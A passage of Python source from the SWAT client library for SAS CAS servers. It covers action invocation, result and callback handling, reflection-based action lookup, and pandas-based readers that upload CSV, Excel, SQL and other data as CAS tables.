object, you can control how the responses and results from the server are
handled in your own functions using the ``responsefunc`` or ``resultfunc`` keyword
arguments.
The ``responsefunc`` argument allows you to specify a function that is called for
each response from the server after the action is called. The ``resultfunc``
is called for each result in a response. These functions cannot be used at the
same time; if both are specified, only ``resultfunc`` is used.
Below is an example of using a ``responsefunc`` function.
This function closely mimics what the `retrieve` method does by default.
>>> def myfunc(response, connection, userdata):
... if userdata is None:
... userdata = {}
... for key, value in response:
... userdata[key] = value
... return userdata
>>> out = s.retrieve('help', responsefunc=myfunc)
>>> print(out['builtins'])
name description
0 addnode Add a node to the server
1 help Lists the available actions
2 listnodes List the server nodes
.
.
.
The same result can be obtained using the ``resultfunc`` option as well.
>>> def myfunc(key, value, response, connection, userdata):
... if userdata is None:
... userdata = {}
... userdata[key] = value
... return userdata
>>> out = s.retrieve('help', resultfunc=myfunc)
>>> print(out['builtins'])
name description
0 addnode Add a node to the server
1 help Lists the available actions
2 listnodes List the server nodes
.
.
.
'''
kwargs = dict(kwargs)
# Decode from JSON as needed
if '_json' in kwargs:
newargs = json.loads(kwargs['_json'])
newargs.update(kwargs)
del newargs['_json']
kwargs = newargs
datamsghandler = None
if 'datamsghandler' in kwargs:
datamsghandler = kwargs['datamsghandler']
kwargs.pop('datamsghandler')
if self._protocol.startswith('http'):
raise SWATError('Data message handlers are not supported '
'in the REST interface.')
# Response callback function
responsefunc = None
if 'responsefunc' in kwargs:
responsefunc = kwargs['responsefunc']
kwargs.pop('responsefunc')
# Result callback function
resultfunc = None
if 'resultfunc' in kwargs:
resultfunc = kwargs['resultfunc']
kwargs.pop('resultfunc')
try:
# Call the action and compile the results
signature = self._invoke_with_signature(a2n(_name_), **kwargs)
results = self._get_results(getnext(self, datamsghandler=datamsghandler),
responsefunc=responsefunc, resultfunc=resultfunc)
except SWATCASActionRetry:
signature = self._invoke_with_signature(a2n(_name_), **kwargs)
results = self._get_results(getnext(self, datamsghandler=datamsghandler),
responsefunc=responsefunc, resultfunc=resultfunc)
# Return raw data if a function was supplied
if responsefunc is not None or resultfunc is not None:
return results
results.signature = signature
# run post-processing hooks
if signature and signature.get('name') in self._results_hooks:
for func in self._results_hooks[signature['name']]:
func(self, results)
return results
def _get_results(self, riter, responsefunc=None, resultfunc=None):
'''
Walk through responses in ``riter`` and compile results
Parameters
----------
riter : iterable
Typically a CAS object, but any iterable that returns a
response / connection pair for each iteration can be used.
responsefunc : callable, optional
Callback function that is called for each response
resultfunc : callable, optional
Callback function that is called for each result
Returns
-------
CASResults
If no callback functions were supplied.
any
If a callback function is supplied, the result of that function
is returned.
'''
results = CASResults()
results.messages = messages = []
results.updateflags = updateflags = set()
results.session = self._session
results.sessionname = self._name
events = results.events
idx = 0
resultdata = None
responsedata = None
try:
for response, conn in riter:
if response.disposition.status_code == RETRY_ACTION_CODE:
raise SWATCASActionRetry(response.disposition.status)
elif response.disposition.status_code == SESSION_ABORTED_CODE:
# Any new requests sent to the session will never return,
# so just close the connection now.
self.close()
raise SWATCASActionError(response.disposition.status, response, conn)
if responsefunc is not None:
responsedata = responsefunc(response, conn, responsedata)
continue
# Action was restarted by the server
if 'action-restart' in response.updateflags:
results = CASResults()
results.messages = messages = []
results.updateflags = updateflags = set()
results.session = self._session
results.sessionname = self._name
events = results.events
idx = 0
continue
# CASTable parameters
caslib = None
tablename = None
castable = None
for key, value in response:
if resultfunc is not None:
resultdata = resultfunc(key, value, response,
conn, resultdata)
continue
if key is None or isinstance(key, int_types):
results[idx] = value
idx += 1
else:
lowerkey = key.lower()
if lowerkey == 'tablename':
tablename = value
elif lowerkey == 'caslib':
caslib = value
elif lowerkey == 'castable':
castable = True
# Event results start with '$'
if key.startswith('$'):
events[key] = value
else:
results[key] = value
# Create a CASTable instance if all of the pieces are there
if caslib and tablename and not castable:
results['casTable'] = self.CASTable(tablename, caslib=caslib)
results.performance = response.performance
for key, value in six.iteritems(response.disposition.to_dict()):
setattr(results, key, value)
messages.extend(response.messages)
updateflags.update(response.updateflags)
except SWATCASActionError as err:
if responsefunc:
err.results = responsedata
elif resultfunc:
err.results = resultdata
else:
err.results = results
err.events = events
raise err
if responsefunc is not None:
return responsedata
if resultfunc is not None:
return resultdata
return results
def __getattr__(self, name, atype=None):
'''
Convenience method for getting a CASActionSet/CASAction as an attribute
When an attribute that looks like an action name is accessed, CAS
is queried to see if it is an action set or action name. If so,
the reflection information for the entire actionset is used to
generate classes for the actionset and all actions.
Parameters
----------
name : string
Action name or action set name
atype : string, optional
Type of item to search for exclusively ('actionset', 'action',
or 'action_class')
Returns
-------
CASAction
If `name` is an action name
CASActionSet
If `name` is an action set name
Raises
------
AttributeError
if `name` is neither an action name nor an action set name
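Examples
--------
A sketch of the attribute-style lookup, assuming an existing
connection ``conn``:
>>> asobj = conn.builtins              # action set lookup
>>> action = conn.loadactionset        # direct action lookup
>>> action = conn.builtins.loadactionset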
'''
class_requested = False
origname = name
# Normalize name
if re.match(r'^[A-Z]', name):
class_requested = True
if atype is not None and atype == 'action_class':
class_requested = True
atype = 'action'
name = name.lower()
# Check cache for actionset and action classes
if (atype in [None, 'actionset'] and name in self._actionset_classes
and self._actionset_classes[name] is not None):
return self._actionset_classes[name]()
if (atype in [None, 'action'] and name in self._action_classes
and self._action_classes[name] is not None):
if class_requested:
return self._action_classes[name]
return self._action_classes[name]()
# See if the action/action set exists
asname, actname, asinfo = self._get_actionset_info(name.lower(), atype=atype)
# Generate a new actionset class
ascls = CASActionSet.from_reflection(asinfo, self)
# Add actionset and actions to the cache
self._actionset_classes[asname.lower()] = ascls
for key, value in six.iteritems(ascls.actions):
self._action_classes[key] = value
self._action_classes[asname.lower() + '.' + key] = value
# Check cache for actionset and action classes
if atype in [None, 'actionset'] and name in self._actionset_classes:
return self._actionset_classes[name]()
if atype in [None, 'action'] and name in self._action_classes:
if class_requested:
return self._action_classes[name]
return self._action_classes[name]()
raise AttributeError(origname)
def _get_action_info(self, name, showhidden=True):
'''
Get the reflection information for the given action name
Parameters
----------
name : string
Name of the action
showhidden : boolean
Should hidden actions be shown?
Returns
-------
( string, string, dict )
Tuple containing action-set-name, action-name, and action-info-dict
'''
name = name.lower()
if name in self._action_info:
return self._action_info[name]
asname, actname, asinfo = self._get_reflection_info(name, showhidden=showhidden)
# If action name is None, it is the same as the action set name
if actname is None:
actname = asname
# Populate action set info while we're here
self._actionset_info[asname.lower()] = asname, None, asinfo
# Populate action info
actinfo = {}
for item in asinfo.get('actions'):
asname, aname = item['name'].split('.', 1)
if aname == actname.lower():
actinfo = item
self._action_info[aname] = asname, aname, item
self._action_info[item['name']] = asname, aname, item
return asname, actname, actinfo
def _get_actionset_info(self, name, atype=None, showhidden=True):
'''
Get the reflection information for the given action set / action name
If the name is an action set, the returned action name will be None.
Parameters
----------
name : string
Name of the action set or action
atype : string, optional
Specifies the type of the name ('action' or 'actionset')
showhidden : boolean, optional
Should hidden actions be shown?
Returns
-------
( string, string, dict )
Tuple containing action-set-name, action-name, and action-set-info-dict
'''
name = name.lower()
if atype in [None, 'actionset'] and name in self._actionset_info:
return self._actionset_info[name]
if atype in [None, 'action'] and name in self._action_info:
asname, aname, actinfo = self._action_info[name]
return asname, aname, self._actionset_info[asname.lower()][-1]
asname, actname, asinfo = self._get_reflection_info(name, atype=atype,
showhidden=showhidden)
# Populate action set info
self._actionset_info[asname.lower()] = asname, None, asinfo
# Populate action info while we're here
for item in asinfo.get('actions'):
asname, aname = item['name'].split('.', 1)
self._action_info[aname] = asname, aname, item
self._action_info[item['name']] = asname, aname, item
return asname, actname, asinfo
def _get_reflection_info(self, name, atype=None, showhidden=True):
'''
Get the action set name, action name, and reflection information for the given name
Parameters
----------
name : string
Name of the action or action set
atype : string, optional
Specifies the type of the name ('action' or 'actionset')
showhidden : boolean, optional
Should hidden actions be shown?
Returns
-------
tuple
( action set name, action name, action set reflection info )
'''
asname = None
actname = None
# See if the name is an action set name, action name, or nothing
if atype in [None, 'actionset']:
for response in self._invoke_without_signature('builtins.queryactionset',
actionset=name,
_messagelevel='error',
_apptag='UI'):
for key, value in response:
if value:
asname = name.lower()
break
if asname is None:
idx = 0
out = {}
for response in self._invoke_without_signature('builtins.queryname',
name=name,
_messagelevel='error',
_apptag='UI'):
for key, value in response:
if key is None or isinstance(key, int_types):
out[idx] = value
idx += 1
else:
out[key] = value
asname = out.get('actionSet')
actname = out.get('action')
# We can't have both in the same namespace, action set name wins
if asname == actname:
actname = None
# If we have an action set name, reflect it
if asname:
asname = asname.lower()
query = {'showhidden': showhidden, 'actionset': asname}
if not get_option('interactive_mode'):
query['showlabels'] = False
idx = 0
out = {}
for response in self._invoke_without_signature('builtins.reflect',
_messagelevel='error',
_apptag='UI', **query):
for key, value in response:
if key is None or isinstance(key, int_types):
out[idx] = value
idx += 1
else:
out[key] = value
# Normalize the output
asinfo = _lower_actionset_keys(out[0])
for act in asinfo.get('actions'):
act['name'] = (asname + '.' + act['name']).lower()
return asname, actname, asinfo
raise AttributeError(name)
def __iter__(self):
'''
Iterate over responses from CAS
If you used the :meth:`invoke` method to call a CAS action, the
responses from the server are not automatically retrieved. You
will need to pull them down manually. Iterating over the CAS
connection object after calling :meth:`invoke` will pull responses
down until they have been exhausted.
Examples
--------
>>> conn = swat.CAS()
>>> conn.invoke('serverstatus')
>>> for resp in conn:
... for k, v in resp:
... print(k, v)
See Also
--------
:meth:`invoke` : Calls a CAS action without retrieving results
:meth:`retrieve` : Calls a CAS action and retrieves results
Yields
------
:class:`CASResponse` object
'''
for response, conn in getnext(self, timeout=0):
if conn is not None:
yield response
#
# Top-level Pandas functions
#
def _get_table_args(self, **kwargs):
''' Extract table parameters from function arguments '''
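# A sketch of the extraction with hypothetical values:
#   casout=dict(name='iris', caslib='casuser', replace=True)
#     -> ({'table': 'iris', 'caslib': 'casuser', 'replace': True}, other kwargs)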
out = {}
kwargs = kwargs.copy()
casout = kwargs.pop('casout', {})
if isinstance(casout, CASTable):
casout = casout.to_outtable_params()
elif not isinstance(casout, dict):
casout = dict(name=casout)
out['table'] = casout.get('name', None)
out['caslib'] = casout.get('caslib', None)
out['replace'] = casout.get('replace', None)
out['label'] = casout.get('label', None)
out['promote'] = casout.get('promote', None)
if not out['table']:
out.pop('table')
if not out['caslib']:
out.pop('caslib')
if out['replace'] is None:
out.pop('replace')
if out['label'] is None:
out.pop('label')
if out['promote'] is None:
out.pop('promote')
return out, kwargs
def load_path(self, path=None, readahead=None, importoptions=None,
promote=None, ondemand=None, attrtable=None,
caslib=None, datasourceoptions=None, casout=None, singlepass=None,
where=None, vars=None, groupby=None, groupbyfmts=None,
groupbymode=None, orderby=None, nosource=None, returnwhereinfo=None,
**kwargs):
'''
Load a path from a CASLib
The parameters for this are the same as for the ``builtins.loadtable``
CAS action. This method is simply a convenience method that loads a
table and returns a :class:`CASTable` in one step.
Notes
-----
The path specified must exist on the **server side**. For loading
data from the client side, see the ``read_*`` and :meth:`upload` methods.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.load_path('data/iris.csv')
>>> print(tbl.head())
See Also
--------
:meth:`read_csv`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
args = {k: v for k, v in dict(path=path, readahead=readahead,
importoptions=importoptions, promote=promote,
ondemand=ondemand, attrtable=attrtable, caslib=caslib,
datasourceoptions=datasourceoptions, casout=casout,
singlepass=singlepass, where=where, vars=vars, groupby=groupby,
groupbyfmts=groupbyfmts, groupbymode=groupbymode,
orderby=orderby, nosource=nosource,
returnwhereinfo=returnwhereinfo).items() if v is not None}
args.update(kwargs)
out = self.retrieve('table.loadtable', _messagelevel='error', **args)
try:
return out['casTable']
except KeyError:
raise SWATError(out.status)
def _importoptions_from_dframe(self, dframe):
'''
Derive importoptions= values from DataFrame
'''
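# Only integer columns need an explicit CSV type; if none are present,
# fall back to the server's type guessing (implicitly returns None).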
use_options = False
ivars = []
importoptions = dict(filetype='csv', vars=ivars)
for i, dtype in enumerate(dframe.dtypes.values):
dtype = str(dtype)
if 'int64' in dtype:
ivars.append(dict(type='int64'))
use_options = True
elif 'int32' in dtype:
ivars.append(dict(type='int32'))
use_options = True
else:
ivars.append({})
if use_options:
return importoptions
def _read_any(self, _method_, *args, **kwargs):
'''
Generic data file reader
Parameters
----------
_method_ : string
The name of the pandas data reader function.
*args : one or more arguments
Arguments to pass to the data reader.
**kwargs : keyword arguments
Keyword arguments to pass to the data reader function.
The 'casout' keyword parameter is stripped and used for the
output CAS table parameters.
Returns
-------
:class:`CASTable`
'''
import pandas as pd
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(**kwargs)
dframe = getattr(pd, _method_)(*args, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.PandasDataFrame(dframe).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_pickle(self, path, casout=None, **kwargs):
'''
Load pickled pandas object from the specified path
This method calls :func:`pandas.read_pickle` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
path : string
Path to a local pickle file.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_pickle`.
Notes
-----
Paths to specified files point to files on the **client machine**.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_pickle('dataframe.pkl')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_pickle`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_pickle', path, casout=casout, **kwargs)
def read_table(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read general delimited file into a CAS table
This method calls :func:`pandas.read_table` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : str or any object with a read() method
Path, URL, or buffer to read.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
Notes
-----
Paths to specified files point to files on the client machine.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_table('iris.tsv')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_table`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
import pandas as pd
dframe = pd.read_table(filepath_or_buffer, **kwargs)
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.Text(filepath_or_buffer, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_csv(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read CSV file into a CAS table
This method calls :func:`pandas.read_csv` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : str or any object with a read() method
Path, URL, or buffer to read.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_csv`.
Notes
-----
Paths to specified files point to files on the client machine.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_csv('iris.csv')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_csv`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
import pandas as pd
dframe = pd.read_csv(filepath_or_buffer, **kwargs)
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.CSV(filepath_or_buffer, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_frame(self, dframe, casout=None, **kwargs):
'''
Convert DataFrame to CAS table
Parameters
----------
dframe : DataFrame
The DataFrame to read into CAS
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
Notes
-----
When `use_addtable=False` (the default) is specified, this method
is equivalent to `upload_frame`. If `use_addtable=True` is specified,
the `table.addtable` CAS action is used and the DataFrame does not
need to be written to disk first. However, this mode can only be used
with the binary (not REST) protocol.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_frame(pd.DataFrame(np.random.randn(100, 4),
... columns=list('ABCD')))
>>> print(tbl.head())
See Also
--------
:meth:`upload_frame`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.PandasDataFrame(dframe, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_fwf(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read a table of fixed-width formatted lines into a CAS table
This method calls :func:`pandas.read_fwf` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : str or any object with a read() method
Path, URL, or buffer to read.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_fwf`.
Notes
-----
Paths to specified files point to files on the client machine.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_fwf('iris.dat')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_fwf`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
import pandas as pd
dframe = pd.read_fwf(filepath_or_buffer, **kwargs)
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.FWF(filepath_or_buffer, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_clipboard(self, casout=None, **kwargs):
'''
Read text from clipboard and pass to :meth:`read_table`
Parameters
----------
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
See Also
--------
:func:`pandas.read_clipboard`
:func:`pandas.read_table`
:meth:`read_table`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_clipboard', casout=casout, **kwargs)
def read_excel(self, io, casout=None, **kwargs):
'''
Read an Excel table into a CAS table
This method calls :func:`pandas.read_excel` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
io : string or path object
File-like object, URL, or pandas ExcelFile.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_excel`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_excel('iris.xlsx')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_excel`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_excel', io, casout=casout, **kwargs)
def read_json(self, path_or_buf=None, casout=None, **kwargs):
'''
Read a JSON string into a CAS table
This method calls :func:`pandas.read_json` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
path_or_buf : string or file-like object
The path, URL, or file object that contains the JSON data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_json`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_json('iris.json')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_json`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_json', path_or_buf, casout=casout, **kwargs)
def json_normalize(self, data, casout=None, **kwargs):
'''
"Normalize" semi-structured JSON data into a flat table and upload to a CAS table
This method calls :func:`pandas.json_normalize` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
data : dict or list of dicts
Unserialized JSON objects
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.json_normalize`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.json_normalize([dict(a=1, b=2), dict(a=3, b=4)])
>>> print(tbl.head())
See Also
--------
:func:`pandas.json_normalize`
Returns
-------
:class:`CASTable`
'''
return self._read_any('json_normalize', data, casout=casout, **kwargs)
def read_html(self, io, casout=None, **kwargs):
'''
Read HTML tables into a list of CASTable objects
This method calls :func:`pandas.read_html` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
io : string or file-like object
The path, URL, or file object that contains the HTML data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_html`.
Examples
--------
>>> conn = swat.CAS()
>>> tbls = conn.read_html('iris.html')
>>> print(tbls[0].head())
See Also
--------
:func:`pandas.read_html`
Returns
-------
list of :class:`CASTable` objects
'''
import pandas as pd
from swat import datamsghandlers as dmh
use_addtable = kwargs.pop('use_addtable', False)
out = []
table, kwargs = self._get_table_args(casout=casout, **kwargs)
for i, dframe in enumerate(pd.read_html(io, **kwargs)):
if i and table.get('table'):
table['table'] += str(i)
if not use_addtable or self._protocol.startswith('http'):
out.append(self.upload_frame(dframe, casout=table and table or None))
# importoptions=self._importoptions_from_dframe(dframe)
else:
table.update(dmh.PandasDataFrame(dframe).args.addtable)
out.append(self.retrieve('table.addtable', **table).casTable)
return out
def read_hdf(self, path_or_buf, casout=None, **kwargs):
'''
Read from the HDF store and create a CAS table
This method calls :func:`pandas.read_hdf` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
path_or_buf : string or file-like object
The path, URL, or file object that contains the HDF data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_hdf`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_hdf('iris.h5')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_hdf`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_hdf', path_or_buf, casout=casout, **kwargs)
def read_sas(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read SAS files stored as XPORT or SAS7BDAT into a CAS table
This method calls :func:`pandas.read_sas` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : string or file-like object
The path, URL, or file object that contains the SAS data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sas`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sas('iris.sas7bdat')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_sas`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sas', filepath_or_buffer, casout=casout, **kwargs)
def read_sql_table(self, table_name, con, casout=None, **kwargs):
'''
Read SQL database table into a CAS table
This method calls :func:`pandas.read_sql_table` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
table_name : string
Name of SQL table in database.
con : SQLAlchemy connectable (or database string URI)
Database connection.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sql_table`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sql_table('iris', dbcon)
>>> print(tbl.head())
Notes
-----
The data from the database will be pulled to the client machine
in the form of a :class:`pandas.DataFrame` then uploaded to CAS.
If you are moving large amounts of data, you may want to use
a direct database connector from CAS.
See Also
--------
:func:`pandas.read_sql_table`
:meth:`read_sql_query`
:meth:`read_sql`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sql_table', table_name, con, casout=casout, **kwargs)
def read_sql_query(self, sql, con, casout=None, **kwargs):
'''
Read SQL query table into a CAS table
This method calls :func:`pandas.read_sql_query` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
sql : string
SQL to be executed.
con : SQLAlchemy connectable (or database string URI)
Database connection.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sql_query`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sql_query('select * from iris', dbcon)
>>> print(tbl.head())
Notes
-----
The data from the database will be pulled to the client machine
in the form of a :class:`pandas.DataFrame` then uploaded to CAS.
If you are moving large amounts of data, you may want to use
a direct database connector from CAS.
See Also
--------
:func:`pandas.read_sql_query`
:meth:`read_sql_table`
:meth:`read_sql`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sql_query', sql, con, casout=casout, **kwargs)
def read_sql(self, sql, con, casout=None, **kwargs):
'''
Read SQL query or database table into a CAS table
This method calls :func:`pandas.read_sql` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
sql : string
SQL to be executed or table name.
con : SQLAlchemy connectable (or database string URI)
Database connection.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sql`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sql('select * from iris', dbcon)
>>> print(tbl.head())
Notes
-----
The data from the database will be pulled to the client machine
in the form of a :class:`pandas.DataFrame` then uploaded to CAS.
